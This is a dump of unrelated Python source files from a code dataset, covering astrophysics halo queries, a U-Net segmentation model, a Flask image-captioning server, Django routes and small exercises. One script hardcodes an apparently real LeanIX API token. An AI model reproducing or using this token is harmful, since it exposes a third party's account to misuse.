+{"seq_id":"134710559","text":"from __future__ import absolute_import\nimport numpy as np\n\nfrom .. import BuiltinFunction, FixedInput, FixedNumericInput, StoredProperty, MultiCalculation, ReturnInputHalos\nfrom ... import core\nfrom ... import relation_finding\nfrom ... import temporary_halolist as thl\n\n@BuiltinFunction.register\ndef find_progenitor(source_halos, property_name, property_criterion):\n if property_criterion!='min' and property_criterion!='max':\n raise ValueError(\"Property criterion must be either 'min' or 'max'\")\n\n if len(source_halos)==0:\n return []\n\n all_major_progs = relation_finding.multi_source.MultiSourceAllMajorProgenitorsStrategy(source_halos)\n\n sources = all_major_progs.sources()\n\n property_and_obj = MultiCalculation(ReturnInputHalos(), property_name.name)\n\n with all_major_progs.temp_table() as tt :\n raw_query = thl.halo_query(tt)\n query = property_and_obj.supplement_halo_query(raw_query)\n all_major_progs = query.all()\n db_objects, values = property_and_obj.values_sanitized(all_major_progs, core.Session.object_session(source_halos[0]))\n\n # now re-organize the values so that we have one per source\n values_per_source = {s:[] for s in range(len(source_halos))}\n objs_per_source = {s:[] for s in range(len(source_halos))}\n for source, value, obj in zip(sources, values, db_objects):\n values_per_source[source].append(value)\n objs_per_source[source].append(obj)\n\n results = []\n for s in range(len(source_halos)):\n vals = values_per_source[s]\n objs = objs_per_source[s]\n assert len(vals)==len(objs)\n if len(vals)==0:\n results.append(None)\n else:\n if property_criterion=='min':\n index = np.argmin(vals)\n elif property_criterion=='max':\n index = np.argmax(vals)\n else:\n assert False # should not reach this point\n results.append(objs[index])\n return results\n\n\n\nfind_progenitor.set_input_options(0, provide_proxy=True, assert_class = StoredProperty)\nfind_progenitor.set_input_options(1, provide_proxy=True, assert_class = FixedInput)","sub_path":"tangos/live_calculation/builtin_functions/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"201290961","text":"crate_table_schema = {\n 'type': 'object',\n 'properties': {\n 'column_types': {\n 'type': 'object',\n 'minLength': 1,\n 'additionalProperties': {\n 'type': 'string',\n 'minLength': 1\n },\n 'maxProperties': 1024\n },\n 'read_only_groups': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n 'minLength': 0,\n }\n }\n },\n 'requiredProperties': ['column_types'],\n 'additionalProperties': False,\n}\n\nmerge_table_data_schema = {\n 'type': 'object',\n 'properties': {\n 'merge_column_names': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n 'minLength': 1,\n }\n }\n },\n 'requiredProperties': ['merge_column_names'],\n 'additionalProperties': False,\n}","sub_path":"almacen_api/companies/feeds_validation.py","file_name":"feeds_validation.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"436707343","text":"import requests\nimport datetime\nimport json\n\n\nURL=\"http://covid-openknowledge.herokuapp.com/covidOpenKnowledge/api/v1/noticias\"\n\ndef post_noticias(data):\n print()\n payload={\n # \"estadoCuarentena\": \"true\",\n # \"fecha\": str(datetime.datetime.utcnow()),\n \"fuente\": str(data['fuente']),\n \"resumen\": str(data['resumen']),\n \"titulo\": str(data['titulo'])\n }\n data = json.dumps(payload)\n r = requests.post(URL, data = data,headers={'Content-Type': 'application/json',\"charset\":\"UTF-8\"},)\n # print(r.json())\n # return r\n return r.text","sub_path":"bots/api_covid.py","file_name":"api_covid.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"223751046","text":"\n# coding: utf-8\n\n\n\n\nfrom requests import post\nfrom json import dumps\nfrom pandas.io.json import json_normalize\n\napi_token = 'DN3Q4dh3a3X6KBf7QTv73QDnuDYymZyOqcUtt4Ch'\nauth_url = 'https://app.leanix.net/services/mtm/v1/oauth2/token' # or something else if you have a dedicated MTM instance - you will know it if that is the case and if you don't just use this one.\nrequest_url_pf = 'https://demo-eu.leanix.net/services/pathfinder/v1/graphql' # same thing as with the auth_url\nrequest_url_metrics = 'https://demo-eu.leanix.net/services/metrics/v1/points'\n\nresponse = post(auth_url,\n auth=('apitoken', api_token),\n data={'grant_type': 'client_credentials'})\nresponse.raise_for_status() # this merely throws an error, if Webserver does not respond with a '200 OK'\naccess_token = response.json()['access_token']\n\n\n\n\ngql_request_query = '''\nquery allFactSheetsQuery($filter: FilterInput!, $sortings: [Sorting]) {\n allFactSheets(first: 40, filter: $filter, sort: $sortings) {\n totalCount\n pageInfo {\n hasNextPage\n hasPreviousPage\n startCursor\n endCursor\n }\n edges {\n node {\n ... on Hospital {\n id\n displayName\n bedsTotal\n bedsTotalUsed\n bedsICU\n bedsICUUsed\n relHospitalToPlace {\n edges{\n node{\n id\n factSheet {\n id\n name \n }\n }\n }\n }\n }\n }\n }\n }\n}\n''' \ngql_request_variables = {\"filter\":{\"facetFilters\":[{\"facetKey\":\"FactSheetTypes\",\"operator\":\"OR\",\"keys\":[\"Hospital\"]},{\"facetKey\":\"relHospitalToPlace\",\"operator\":\"NOR\",\"keys\":[\"__missing__\"]}]},\"sortings\":[{\"key\":\"displayName\",\"order\":\"asc\"}]}\n\n\n\ndata = {\"query\" : gql_request_query, \"variables\": gql_request_variables}\njson_data = dumps(data)\nauth_header = 'Bearer ' + access_token\nheader = {'Authorization': auth_header}\n \nresponse = post(url=request_url_pf, headers=header, data=json_data)\nresponse.raise_for_status()\n## Next: take the output and form a meaningful python object:\nhospital_data = json_normalize(response.json()['data']['allFactSheets']['edges'])\n\n\n\n## extract plac_id\nhospital_data['place_id'] = hospital_data.apply(lambda row: row['node.relHospitalToPlace.edges'][0]['node']['factSheet']['id'], axis=1)\n\n##group by the places\nplaces_sum_df = hospital_data.groupby(['place_id']).sum()\n\n\nplaces_sum_df.columns = ['bedsTotal','bedsTotalUsed','bedsICU','bedsICUUsed']\n\n\nfor key, value in places_sum_df.iterrows():\n data = {\n 'measurement': 'Availability of Beds',\n 'workspaceId': '0c4b27c9-dd38-4d42-a7f4-d3a7b5ea0551',\n 'tags': [\n {\n 'k': 'factSheetId',\n 'v': key\n }\n ],\n 'fields':\n [\n {\n 'k': 'bedsTotal',\n 'v': value['bedsTotal']\n },\n {\n 'k': 'bedsTotalUsed',\n 'v': value['bedsTotalUsed']\n },\n {\n 'k': 'bedsICU',\n 'v': value['bedsICU']\n },\n {\n 'k': 'bedsICUUsed',\n 'v': value['bedsICUUsed']\n }\n ]\n }\n json_data = dumps(data)\n header_metrics = {'Authorization': auth_header, 'Content-Type': 'application/json'}\n response = post(url=request_url_metrics, headers=header_metrics, data = json_data)\n response.raise_for_status()\n print(response.json())\n\n\n# In[38]:\n\n\n## Generate dummy legacy data:\n## comment in the two last lines to generate the dummy data again.\nfrom datetime import timedelta, date\nfrom math import floor\nfor key, value in places_sum_df.iterrows():\n for single_date in (date.today() - timedelta(n) for n in range(7)):\n \n data = {\n 'measurement': 'Availability of Beds',\n 'workspaceId': '0c4b27c9-dd38-4d42-a7f4-d3a7b5ea0551',\n 'tags': [\n {\n 'k': 'factSheetId',\n 'v': key\n }\n ],\n 'time': single_date.isoformat() + 'T08:00:00.000Z',\n 'fields':\n [\n {\n 'k': 'bedsTotal',\n 'v': value['bedsTotal']\n },\n {\n 'k': 'bedsTotalUsed',\n 'v': floor(value['bedsTotalUsed'] * 0.95**((date.today()-single_date).days))\n },\n {\n 'k': 'bedsICU',\n 'v': value['bedsICU']\n },\n {\n 'k': 'bedsICUUsed',\n 'v': floor(value['bedsICUUsed'] * 0.95**((date.today()-single_date).days))\n }\n ]\n }\n json_data = dumps(data)\n header_metrics = {'Authorization': auth_header, 'Content-Type': 'application/json'}\n# response = post(url=request_url_metrics, headers=header_metrics, data = json_data)\n# response.raise_for_status()\n\n","sub_path":"generate-metrics/Availability of Beds Metrics.py","file_name":"Availability of Beds Metrics.py","file_ext":"py","file_size_in_byte":5085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"486993977","text":"def solution(A, B):\n if not isinstance(A, str) or not isinstance(B, str) or not A or not B or len(A) > len(B):\n print(\"Invalid input\")\n return -1\n\n hashTableA = [0] * 26\n for s in A:\n hashTableA[ord(s) - ord('a')] += 1\n\n hashTableB = [0] * 26\n for i in range(len(A)):\n hashTableB[ord(A[i]) - ord('a')] += 1\n\n if hashTableA == hashTableB:\n return True\n\n for i in range(len(A), len(B)):\n hashTableB[ord(B[i - len(A)]) - ord('a')] -= 1\n hashTableB[ord(B[i]) - ord('a')] += 1\n\n if hashTableB == hashTableA:\n return True\n\n return False\n\n\nA = 'acb'\nB = 'dabce'\n\nprint(solution(A, B))\n","sub_path":"others/OnlineTest_Recruitment/ms_AFullPermutationInB.py","file_name":"ms_AFullPermutationInB.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"560148497","text":"from random import randint\r\nimport time\r\n\r\n\r\nclass Cliente:\r\n def __init__(self):\r\n self.nomes = []\r\n self.horas = []\r\n \r\n def IsEMPTY(self):\r\n return len(self.nomes) == 0\r\n\r\n def ENQUEUE(self, nome, hora):\r\n self.nomes.append(nome)\r\n self.horas.append(hora)\r\n\r\n def DEQUEUE(self):\r\n if (not(self.IsEMPTY())):\r\n return self.nomes.pop(0)\r\n return self.horas.pop(0)\r\n\r\n def LENGTH(self):\r\n return len(self.nomes)\r\n\r\ndef main(): \r\n FilaClientes = Cliente()\r\n\r\n for i in range(1,5):\r\n FilaClientes.nomes.append(\"Cliente %d\"%(i))\r\n FilaClientes.horas.append(\"07:%d5 AM\"%(i))\r\n\r\n print(\"------- Clientes na fila -------\")\r\n print(FilaClientes.nomes, \"\\n\")\r\n\r\n print(\"------- Hora de chegada na fila -------\")\r\n print(FilaClientes.horas, \"\\n\")\r\n\r\n\r\n somaTempo = 0\r\n\r\n for i in range(1,5):\r\n print(\"Atendimento do Cliente %d sendo realizado...\"%(i))\r\n print(\"Atendimento realizado com sucesso!\\n\")\r\n intervaloTempo = randint(2, 10)\r\n\r\n tempoInicial = time.time()\r\n time.sleep(intervaloTempo)\r\n FilaClientes.DEQUEUE()\r\n tempoFinal = time.time()\r\n\r\n tempoTotal = tempoFinal-tempoInicial\r\n\r\n somaTempo+=tempoTotal\r\n\r\n mediaTempo = somaTempo/len(FilaClientes.horas)\r\n print(\"A media total de atendimento é de %d minutos.\"%(mediaTempo))\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n \r\n","sub_path":"AtividadeFila2/Atividade Fila 02/Questão 03.py","file_name":"Questão 03.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"532508274","text":"import os\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nfrom torchsummary import summary\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader\nfrom sklearn.metrics import confusion_matrix\nimport numpy as np\nimport PIL\nfrom PIL import Image\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#print(device)\n\ntraining_image_dir = 'data/KITTI_SEMANTIC/Training_00/RGB/'\ntraining_target_dir = 'data/KITTI_SEMANTIC/Training_00/GT/'\ntest_image_dir = 'data/KITTI_SEMANTIC/Validation_07/RGB/'\ntest_target_dir = 'data/KITTI_SEMANTIC/Validation_07/GT/'\noutput_dir = 'data/KITTI_SEMANTIC/Result/'\nn_classes = 12\nimgage_width = 800\nimage_height = 320\n\ncolor_to_int = {(64, 0, 128): 0,\n (128, 128, 128): 1,\n (128, 128, 0): 2,\n (64, 64, 128): 3,\n (128, 0, 0): 4,\n (0, 0, 0): 5,\n (0, 0, 192): 6,\n (128, 64, 128): 7,\n (192, 128, 128): 8,\n (192, 192, 128): 9,\n (0, 128, 192): 10,\n (64, 64, 0): 11}\n\nint_to_color = {0: (64, 0, 128),\n 1: (128, 128, 128),\n 2: (128, 128, 0),\n 3: (64, 64, 128),\n 4: (128, 0, 0),\n 5: (0, 0, 0),\n 6: (0, 0, 192),\n 7: (128, 64, 128),\n 8: (192, 128, 128),\n 9: (192, 192, 128),\n 10: (0, 128, 192),\n 11: (64, 64, 0)}\n\n\ndef to_categorical(y, num_classes):\n \"\"\" 1-hot encodes a tensor \"\"\"\n return np.eye(num_classes, dtype='uint8')[y]\n\nclass KITTITrainingDataset(Dataset):\n\n def __init__(self, image_dir, target_dir, transform=None):\n self.image_dir = image_dir\n self.target_dir = target_dir\n self.transform = transform\n self.file_names = os.listdir(self.image_dir)\n self.color_idx = 0\n self.n_images = len(self.file_names)\n self.crop_box = (0, 0, imgage_width, image_height)\n\n def __len__(self):\n return len(self.file_names)\n\n def __getitem__(self, idx):\n training_image = np.array(Image.open(os.path.join(self.image_dir, self.file_names[idx])).crop(self.crop_box))\n target_image = np.array(Image.open(os.path.join(self.target_dir, self.file_names[idx])).crop(self.crop_box))\n img_height, img_width, channel = target_image.shape\n unique_colors = set(tuple(v) for m2d in target_image for v in m2d)\n for color in unique_colors:\n if color not in color_to_int.keys():\n color_to_int[color] = self.color_idx\n int_to_color[self.color_idx] = color\n self.color_idx += 1\n\n target_image = [[color_to_int[tuple(color)] for color in row] for row in target_image]\n if self.transform:\n training_image = self.transform(training_image)\n target_image = np.asarray([to_categorical(row, n_classes) for row in target_image])\n sample = {'image': training_image.reshape(3, img_height, img_width), \\\n 'target': target_image.reshape(n_classes, img_height, img_width)}\n return sample\n\n\nclass ConvBlock(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(ConvBlock, self).__init__()\n self.batch_norm = nn.BatchNorm2d(out_channels)\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1) #padding=1\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1) #padding=1\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = self.batch_norm(x)\n x = F.relu(self.conv2(x))\n x = self.batch_norm(x)\n return x\n\n\nclass Unet(nn.Module):\n def __init__(self, n_classes):\n super(Unet, self).__init__()\n self.n_classes = n_classes\n\n self.pool1 = nn.MaxPool2d(kernel_size=2)\n self.pool2 = nn.MaxPool2d(kernel_size=2)\n self.pool3 = nn.MaxPool2d(kernel_size=2)\n self.pool4 = nn.MaxPool2d(kernel_size=2)\n\n self.up1 = nn.Upsample(scale_factor=2, mode='nearest')\n self.up2 = nn.Upsample(scale_factor=2, mode='nearest')\n self.up3 = nn.Upsample(scale_factor=2, mode='nearest')\n self.up4 = nn.Upsample(scale_factor=2, mode='nearest')\n\n self.conv1 = ConvBlock(3, 32)\n self.conv2 = ConvBlock(32, 64)\n self.conv3 = ConvBlock(64, 128)\n self.conv4 = ConvBlock(128, 256)\n self.conv5 = ConvBlock(256, 512)\n\n self.conv6 = ConvBlock(768, 256)\n self.conv7 = ConvBlock(384, 128)\n self.conv8 = ConvBlock(192, 64)\n self.conv9 = ConvBlock(96, 32)\n\n self.conv10 = nn.Conv2d(32, n_classes, 1, 1)\n\n def forward(self, x):\n c1 = self.conv1(x)\n x = self.pool1(c1)\n c2 = self.conv2(x)\n x = self.pool2(c2)\n c3 = self.conv3(x)\n x = self.pool3(c3)\n c4 = self.conv4(x)\n x = self.pool4(c4)\n x = self.conv5(x)\n x = self.up1(x)\n x = torch.cat([x, c4], 1)\n x = self.conv6(x)\n x = self.up2(x)\n x = torch.cat([x, c3], 1)\n x = self.conv7(x)\n x = self.up3(x)\n x = torch.cat([x, c2], 1)\n x = self.conv8(x)\n x = self.up4(x)\n x = torch.cat([x, c1], 1)\n x = self.conv9(x)\n x = self.conv10(x)\n return x\n\n\ndef train(model, dataset, criterion, optimizer, batch_size=1, shuffle=False):\n optimizer.zero_grad()\n\n dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=1)\n total_loss = []\n for i_batch, sample_batched in enumerate(dataloader):\n image, target = Variable(sample_batched['image'].cuda()), Variable(sample_batched['target'].cuda())\n image = image.type(torch.cuda.FloatTensor)\n topv_target, topi_target = target.type(torch.cuda.LongTensor).view(-1, n_classes).topk(1)\n target = topi_target.squeeze().detach()\n\n output = model(image).view(-1, n_classes)\n output = F.log_softmax(output, dim=-1) # or dim=1 also can\n\n loss = criterion(output, target)\n total_loss.append(loss.item())\n loss.backward()\n optimizer.step()\n return np.mean(total_loss)\n\n\ndef evaluate(model, n_images):\n with torch.no_grad():\n dataset = KITTITrainingDataset(test_image_dir, test_target_dir)\n dataloader = DataLoader(dataset, batch_size=n_images, shuffle=False, num_workers=1)\n\n for i_batch, sample_batched in enumerate(dataloader):\n images, truths = Variable(sample_batched['image'].cuda()), Variable(sample_batched['target'].cuda())\n images = images.type(torch.cuda.FloatTensor)\n outputs = []\n targets = []\n\n for idx, output in enumerate(model(images)):\n target = truths[idx]\n topv_target, topi_target = target.type(torch.cuda.LongTensor).view(-1, n_classes).topk(1)\n target = topi_target.squeeze().detach()\n target = target.cpu().numpy()\n targets.append(target)\n\n # for prediction\n output = output.view(-1, n_classes)\n output = F.log_softmax(output, dim=-1)\n topv_output, topi_output = output.view(-1, n_classes).topk(1)\n output = topi_output.squeeze().detach()\n output = output.cpu().numpy()\n outputs.append(output)\n\n output_image = []\n target_image = []\n for i, item in enumerate(output):\n output_image.append(list(int_to_color[item]))\n target_image.append(list(int_to_color[target[i]]))\n output_image = np.array(output_image, dtype='uint8').reshape(image_height, imgage_width, 3) # int32 by defaulr\n target_image = np.array(target_image, dtype='uint8').reshape(image_height, imgage_width, 3)\n original_image = np.array(images[idx], dtype='uint8').reshape(image_height, imgage_width, 3)\n img_output = Image.fromarray(output_image, 'RGB')\n img_target = Image.fromarray(target_image, 'RGB')\n img_original = Image.fromarray(original_image, 'RGB')\n img_output.save(os.path.join(output_dir, 'output_' + dataset.file_names[idx]))\n img_target.save(os.path.join(output_dir, 'target_' + dataset.file_names[idx]))\n img_original.save(os.path.join(output_dir, 'original_' + dataset.file_names[idx]))\n\n matrix = confusion_matrix(np.array(targets)[0], np.array(outputs)[0])\n FP = matrix.sum(axis=0) - np.diag(matrix)\n FN = matrix.sum(axis=1) - np.diag(matrix)\n TP = np.diag(matrix)\n TN = matrix.sum(axis=0).sum() - (FP + FN + TP)\n IoU = np.asarray(TP / (TP + FP + FN))\n\n return IoU.mean()\n\n\ndef trainIters(model, learning_rate, weight_decay, batch_size, n_epochs=1):\n dataset = KITTITrainingDataset(training_image_dir, training_target_dir)\n criterion = nn.NLLLoss()\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)#, weight_decay=weight_decay)\n for i in range(n_epochs):\n loss = train(model, dataset, criterion, optimizer, batch_size)\n torch.save(model, 'model/model.pkl')\n print('Iter: {}, Loss: {}'.format(i, loss))\n\n\n\nif __name__ == '__main__':\n try:\n model = torch.load('model/model.pkl')\n except:\n model = Unet(n_classes).to(device)\n # Train a model\n trainIters(model, learning_rate=0.000001, weight_decay=0.0001, batch_size=1, n_epochs=20)\n\n # Test a model\n IoU = evaluate(model, n_images=3)\n print('IoU: ', IoU)\n\n","sub_path":"UNet.py","file_name":"UNet.py","file_ext":"py","file_size_in_byte":9790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"181898151","text":"#!/usr/bin/env python3\n# Copyright © 2020 BYTEPAL AI, LLC And Its Affiliates. All rights reserved.\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom parlai.scripts.interactive import setup_args\nfrom parlai.core.agents import create_agent\nfrom parlai.core.worlds import create_task\nfrom parlai.core.image_featurizers import ImageLoader\nfrom typing import Dict, Any\nimport json\nimport cgi\nimport PIL.Image as Image\nfrom base64 import b64decode, b64encode\nimport io\nimport os\nimport jsonpickle\nfrom flask import Flask, render_template, request, Response, jsonify, abort, send_file, make_response\nfrom mongoengine import *\nconnect('bytepal_db', host='localhost', port=27017)\n\nPORT = 8081\nSHARED: Dict[str, Any] = {}\nIMAGE_LOADER = None\napp = Flask(__name__)\n\n# I was thinking about the saving the images too but i won't do it for now\n# Schema to save the image captions based on the user\nclass Image_caption(Document):\n user_id = StringField()\n type = StringField()\n text = StringField()\n\n\n@app.route('/image_interact', methods=['POST', 'GET'])\ndef interact():\n if request.method == 'POST':\n # Reading the image\n image = request.files['image'].read()\n # Reading the personality\n personality = request.form.get('personality')\n # Reading the user id\n user_id = request.form.get('user_id')\n # Generating the caption\n model_response = interactive_running(image, personality)\n output = model_response[\"text\"]\n # Saving the user image caption in a MongoDB database\n user_caption = Image_caption(user_id=user_id, type=\"bot\", text=output) # I might not need to send body[\"type\"] i can just hardcode type = \"bot\"\n user_caption.save()\n # Output Response\n response = {\"user_id\":user_id, \"caption\":output, \"type\":\"bot\"}\n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n\n@app.route('/')\ndef hello():\n return \"Image Captioning Server Loading\"\n\n\ndef interactive_running(image, personality):\n reply = {}\n # Selecting the personality\n reply['text'] = personality\n print(\"personaliy is\", personality)\n # Reading the image\n image = Image.open(io.BytesIO(image)).convert('RGB')\n reply['image'] = SHARED['image_loader'].extract(image)\n SHARED['agent'].observe(reply)\n # Generating the caption\n model_res = SHARED['agent'].act()\n return model_res\n\n\ndef setup_interactive():\n parser = setup_args()\n opt = parser.parse_args()\n if not opt.get('model_file'):\n raise RuntimeError('Please specify a model file')\n if opt.get('fixed_cands_path') is None:\n opt['fixed_cands_path'] = os.path.join(\n '/'.join(opt.get('model_file').split('/')[:-1]), 'candidates.txt'\n )\n opt['task'] = 'parlai.agents.local_human.local_human:LocalHumanAgent'\n opt['image_mode'] = 'resnet152'\n SHARED['opt'] = opt\n SHARED['image_loader'] = ImageLoader(opt)\n\n # Create model and assign it to the specified task\n SHARED['agent'] = create_agent(opt, requireModelExists=True)\n SHARED['world'] = create_task(opt, SHARED['agent'])\n\n\n\nif __name__ == '__main__':\n setup_interactive()\n app.run(host=\"0.0.0.0\", debug=False, port=PORT)\n","sub_path":"ai_captioning/captioning_server.py","file_name":"captioning_server.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"15753810","text":"#!/usr/bin/env python3\n#takes in a csv and returns a simplified table of only the interesting bits: date, booking#, name, charge\n##must change name of infile\n\n\nclass Booking():\n def process(self,thismo):\n infile = open(thismo+'.booking.csv') #split('+')\n\n lines = infile.readlines()\n infile.close()\n numb=len(lines)\n\n def thedate( arrn ):\n dated=arrn[4] #split('+')\n if ( len(dated.split('/')) == 3 ):\n dated=dated.split('/')\n if ( int(dated[0]) < 10 ):\n if ( int(dated[1]) < 10 ):\n nd=dated[2]+\"-0\"+dated[0]+\"-0\"+dated[1]\n else:\n nd=dated[2]+\"-0\"+dated[0]+\"-\"+dated[1]\n else:\n if ( int(newdate[1]) < 10 ):\n nd=dated[2]+\"-\"+dated[0]+\"-0\"+dated[1]\n else:\n nd=dated[2]+\"-\"+dated[0]+\"-\"+dated[1]\n\n if nd.split(\"-\")[0] == \"15\": ## only accounts for 2015 dates\n sp=nd.split(\"-\")\n nd=\"20\"+sp[0]+\"-\"+sp[1][-2:]+\"-\"+sp[2][-2:]\n\n if ( len(nd.split(\"-\")) == 3 ):\n nd = nd.split(\" \")[0]\n return nd\n else:\n print(dated)\n print(arrn)\n\n def thebook( arrn ):\n booked=arrn[0]\n return booked\n\n def thename( arrn ):\n named=arrn[3] #split('+')\n if ( named == \"; \" ):\n lastfirst=arrn[2].split(',')\n firstlast=lastfirst[1]+\" \"+lastfirst[0]\n named=firstlast\n named=named.lower()\n return named\n\n def themony( arrn ):\n moneyd=arrn[7] #split('+')\n moneyd=moneyd[4:]\n return moneyd\n\n tosrt=[\"\"]\n for i, item in enumerate(lines):\n spli=lines[i].split('+')\n if ( spli[6] == \"ok\" ):\n td=thedate(spli)\n tb=thebook(spli)\n tn=thename(spli)\n tm=themony(spli)\n if ( td ):\n trb=td+\"+\"+tb+\"+\"+str(tn)+\"+\"+str(tm)\n tosrt.append(trb)\n sortd=\"\\n\".join(sorted(tosrt))\n return sortd\n\n#shagb = Booking().process()\n#print(shagb)\n\n","sub_path":"commcomp/booking.py","file_name":"booking.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"65390544","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.post_list, name='post_list'),\n # path('', views.translate_link, name='translate_link'),\n path('post//', views.post_detail, name='post_detail'),\n path('post/new/', views.post_new, name='post_new'),\n path('post//edit/', views.post_edit, name='post_edit'),\n\n]\n# assign a view called post_list to root url\n# if link is blank (root url : http://127.0.0.1:8000/), go to view post_list\n# post_list is the name of the url that will be used to identify the view\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"82934542","text":"from django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\nfrom website.models import Product, Category, PurchaseOrder\n\n\n# Create default instances using the app's models\n\ncategory_list = [\n Category(1, 'Appliances'),\n Category(2, 'Bedroom Furniture')\n]\n\nproduct_list = [\n Product(\n '7891234123459', None, 'Bread toaster', 'Lorem ipsum',\n 'bread_toaster.jpg', 35.999, category_list[0].id\n ),\n Product(\n '2012345012349', None, 'Wardrobe', 'Lorem ipsum',\n 'wardrobe.jpeg', 55.990, category_list[1].id\n ),\n Product(\n '5901234123457', None, 'Mattress', 'Lorem ipsum',\n 'mattress.jpg', 800.724, category_list[1].id\n )\n]\n\nuser = User.objects.first()\n\npurchase_order_list = [\n PurchaseOrder(timestamp=timezone.now(), user=user, cart=False),\n PurchaseOrder(timestamp=timezone.now(), user=user, cart=False),\n PurchaseOrder(timestamp=timezone.now(), user=user, cart=False),\n]\n\n\nclass Command(BaseCommand):\n\n def _create_tags(self):\n\n Category.objects.all().delete()\n Category.objects.bulk_create(category_list)\n\n Product.objects.all().delete()\n for product in product_list:\n product.save()\n\n PurchaseOrder.objects.all().delete()\n PurchaseOrder.objects.bulk_create(purchase_order_list)\n\n def handle(self, *args, **options):\n self._create_tags()\n","sub_path":"website/management/commands/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"109081566","text":"import tensorflow as tf\n\nclass Layers:\n def __init__(self,config):\n self.config = config\n\n def X_input(self):\n X = tf.placeholder(shape=(None,self.config['model']['max_sent_len']),dtype='int32')\n tf.add_to_collection('senti_X_id',X)\n return X\n\n def attr_Y_input(self):\n attr_Y = tf.placeholder(shape=(None,self.config['model']['attr_num']),dtype='int32')\n tf.add_to_collection('attr_Y',attr_Y)\n return attr_Y\n\n def senti_Y_input(self):\n senti_Y = tf.placeholder(shape=(None,self.config['model']['attr_num'],self.config['model']['senti_num']),dtype='int32')\n tf.add_to_collection('senti_Y',senti_Y)\n return senti_Y\n\n def char_X_input(self):\n X = tf.placeholder(shape=(None, self.config['model']['max_sent_len'],self.config['model']['max_word_len']),dtype='int32')\n tf.add_to_collection('senti_char_X_id',X)\n return X\n\n def padded_word_mask(self,X_id):\n \"\"\"\n\n :param X_id: (batch size, max sent len)\n :return: (batch size, max sent len, word dim)\n \"\"\"\n X_id = tf.cast(X_id, dtype='float32')\n padding_id = tf.ones_like(X_id, dtype='float32') * self.config['model']['padding_word_index']\n is_padding = tf.equal(X_id, padding_id)\n mask = tf.where(is_padding, tf.zeros_like(X_id, dtype='float32'), tf.ones_like(X_id, dtype='float32'))\n mask = tf.tile(tf.expand_dims(mask, axis=2), multiples=[1, 1, self.config['model']['word_dim']])\n return mask\n\n def word_embedding_table(self):\n table = tf.placeholder(shape=(self.config['model']['vocab_size'], self.config['model']['word_dim']),dtype=\"float32\")\n tf.add_to_collection('table', table)\n embedding = tf.Variable(table)\n return embedding\n\n def padded_char_mask(self, char_X_id):\n \"\"\"\n\n :param char_X_id: (batch size, max sent len, max word len)\n :return: (batch size, max sent len, max word len, char dim)\n \"\"\"\n char_X_id = tf.cast(char_X_id,dtype='float32')\n padding_id = tf.ones_like(char_X_id, dtype='float32') * self.config['model']['padding_char_index']\n is_padding = tf.equal(char_X_id, padding_id)\n mask = tf.where(is_padding, tf.zeros_like(char_X_id, dtype='float32'), tf.ones_like(char_X_id, dtype='float32'))\n mask = tf.tile(tf.expand_dims(mask, axis=3), multiples=[1, 1, 1, self.config['model']['char_dim']])\n return mask\n\n\n def char_embedding_table(self):\n table = tf.placeholder(shape = (self.config['model']['char_vocab_size'],self.config['model']['char_dim']),dtype='float32')\n tf.add_to_collection('char_table',table)\n char_embedding = tf.Variable(table)\n return char_embedding\n\n def lookup(self,X_id,table,mask):\n \"\"\"\n\n :param X_id: (batch size, max sent len) / (batch size, max sent len, max char len)\n :param mask: used to prevent update of padded words\n :return:\n \"\"\"\n X = tf.nn.embedding_lookup(table, X_id, partition_strategy='mod', name='lookup_table')\n X = tf.multiply(X,mask)\n return X\n\n def parameter_initializer(self,shape,dtype='float32'):\n stdv=1/tf.sqrt(tf.constant(shape[-1],dtype=dtype))\n init = tf.random_uniform(shape,minval=-stdv,maxval=stdv,dtype=dtype,seed=1)\n return init\n\n def sequence_length(self,X_id,padding_index):\n \"\"\"\n\n :param X_id: (batch size, max sentence len) / (batch size, max sentence len, max word len)\n :return:\n \"\"\"\n padding_id = 